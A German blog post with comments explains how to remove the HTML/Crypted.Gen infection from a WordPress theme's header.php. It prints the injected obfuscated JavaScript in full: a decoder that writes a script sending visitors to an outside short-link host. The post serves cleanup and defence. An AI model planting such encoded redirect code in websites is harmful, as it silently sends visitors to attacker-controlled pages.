Home > it > Wordpress und HTML/Crypted.Gen

Wordpress und HTML/Crypted.Gen

July 24th, 2008 juergens Leave a comment Go to comments

Antivir meldet eine HTML Malware: HTML/Crypted.Gen

Unternehmt folgende Schritte um ihn zu entfernen:

• auf dem FTP Server in folgendes Verzeichnis wechseln: /wp-content/themes/-dein-theme-/

• dort die Datei header.php öffnen

• folgender Inhalt muss gelöscht werden:

<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!62!32!119!105!110!100!111!119!46!108!111!99!97!116!105!111!110!61!34!104!116!116!112!58!47!47!120!114!108!46!117!115!47!107!107!51!119!54!34!32!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>

• Datei wieder hochladen und der Virus ist verbannt

Categories: it Tags:
  1. Lucas
    October 11th, 2008 at 18:13 | #1
    Reply | Quote

    die Datei sollte auch bequem im Admin Bereich editierbar sein :) unter Design > Theme Editor.

    Für alle die nicht per FTP auf den Server kommen weil deren FTP Server nocht mehr läuft, so wie bei mir ;) :D

    Auch ist der Fehler nicht bei allen Themes vorhanden :)

  2. Html Metatags
    November 24th, 2008 at 15:07 | #2
    Reply | Quote

    öhm, wow, was genau verursacht diese Virusmeldung?

  3. admin
    December 1st, 2008 at 23:24 | #3
    Reply | Quote

    Also die Meldung selbst verursacht nix ;)
    Was der ‘Wurm’ allerdings macht, kannst du bei diversen Anti-Viren Software Herstellern nachlesen.

  1. No trackbacks yet.

Spam protection by WP Captcha-Free